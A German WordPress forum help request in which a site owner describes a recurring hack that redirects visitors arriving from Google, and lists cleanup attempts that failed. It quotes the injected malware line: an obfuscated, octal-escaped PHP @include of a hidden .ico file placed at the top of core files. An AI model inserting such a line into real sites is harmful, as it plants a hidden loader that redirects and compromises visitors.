Hack: Redirect wenn die Seite via Google zum ersten Mal aufgerufen wird
-
Hallo zusammen,
ich habe ein sehr merkwürdiges Phänomen. Bei manchen Seiten beobachte ich einen Hack, bei welcher die index.php, die wp-config.php und die wp-settings.php mit folgendem Code in den ersten Zeilen verändert wird:
/*1a0f6*/ @include "\057va\162/w\167w/\166ho\163ts\057co\155mo\164io\156.o\156li\156e/\155ei\156pi\154at\145s.\144e/\167p-\143on\164en\164/p\154ug\151ns\057li\166em\145sh\055si\164eo\162ig\151n-\167id\147et\163/.\145c9\06376\0667.\151co"; /*1a0f6*/
Ich habe schon beobachtet, dass hier eine .ico Datei inkludiert wird, die in Wahrheit jedoch eine Weiterleitung zu einer ominösen Seite beinhaltet. Ich habe die .ico Dateien schon mehrfach gelöscht und die index.php, die wp-config.php und die wp-settings.php wiederhergestellt. Doch nach 1-2 Tagen wurde die Seite erneut gehackt und die Bereinigung geht von vorne los. Folgende Dinge habe ich bereits unternommen, um diesem Problem entgegenzuwirken. Doch bislang alles ohne Erfolg:
- chmod so verändert, dass die Dateien nicht mehr bearbeitet werden können
- Plugin Stealth Login Page
- Passwörter der Benutzer verändert (alle!)
- Passwärter von FTP und Datenbank verändert
- Der Support vom Hoster hatte auch keine Idee mehr
Ihr seid meine letzte Hoffnung. Habt ihr eine Idee, wie es dem Angreifer gelingt ständig die Dateien zu manipulieren? Habt ihr Ideen wie ich das unterbinden kann?
Ich freue mich über jeglichen Hinweis und jede Hilfe.
Liebe Grüße,
MaximDie Seite, für die ich Hilfe brauche: [Anmelden, um den Link zu sehen]
- Das Thema „Hack: Redirect wenn die Seite via Google zum ersten Mal aufgerufen wird“ ist für neue Antworten geschlossen.